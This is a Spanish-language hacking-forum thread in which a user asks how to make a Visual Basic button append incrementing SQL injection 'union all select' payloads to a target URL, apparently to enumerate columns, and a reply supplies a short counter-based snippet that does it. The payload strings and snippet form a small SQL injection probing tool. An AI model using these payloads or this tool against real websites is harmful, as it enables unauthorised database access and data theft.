[SOLUCIONADO] Duda con la v2 de la Tool.

Iniciado por Inteligencia, Agosto 10, 2010, 09:34:43 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Agosto 10, 2010, 09:34:43 PM Ultima modificación: Mayo 12, 2014, 03:28:54 PM por Expermicid
Bueno pues tengo 1 botón y quiero que cuando le clique encima, haga esto:
Código: php
WebBrowser1.Navigate (Text1.Text) + ("-1+union+all+select+0,1--")


Pero que al clicar de nuevo en el mismo boton haga esto:
Código: php
WebBrowser1.Navigate (Text1.Text) + ("-1+union+all+select+0,1,2--")


De nuevo:
Código: php
WebBrowser1.Navigate (Text1.Text) + ("-1+union+all+select+0,1,2,3--")


Y así sucesivamente quiero hacerlo con una posibilidad de 255 veces y que cuando se llege al final envie una alerta diciendo que se ha alcanzado el número máximo de búsqueda.

Lo de la alerta creo que si se hacerlo pero mi pregunta es como hacer que el "-1+union+all+select+0,1--" valla aumentando al final del último número con el ",signum--" y otra vez ",signum--" y asi... aunque lo tenga que escribir manualmente, me da igual, pero que valla aumentando sólo a medida que el usuario clique en ese botón.

Luego tengo otro que lo que hacer es navegar al sitio anterior con:
Código: php
WebBrowser1.GoBack


Y cuando el usuario haga eso si después le da al botón del que hablé antes, que vuelva a aumentar.

Bueno, eso es todo... si tengo más dudas con otras funciones postearé aquí mismo.

Saludos y gracias de antemano.

P.D: Me gustaría que me expliquen el código...

usa apis para eso o pone el code asi t lo agan ! lee algo de webbrowser por ahy o en recursosvisualbasic q es una buen guia!

Buenas, no se ti te entendi, pero lo que necesitas es un acumulador, para que al clicar el boton, valla aumentando o reduciendo en 1 (o el valor que tu quieras) el valor de la variable.

Código: php

Private Sub Command1_Click()
Static Contador As String
   Contador = Contador + 1
   WebBrowser1.Navigate (Text1.Text) + ("-1+union+all+select+0," & Contador & "--")
End Sub


Saludos.







No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

xDDDDDD Esto ya lo resolvi, se me olvidó cerrar, gracias de todos modos (L)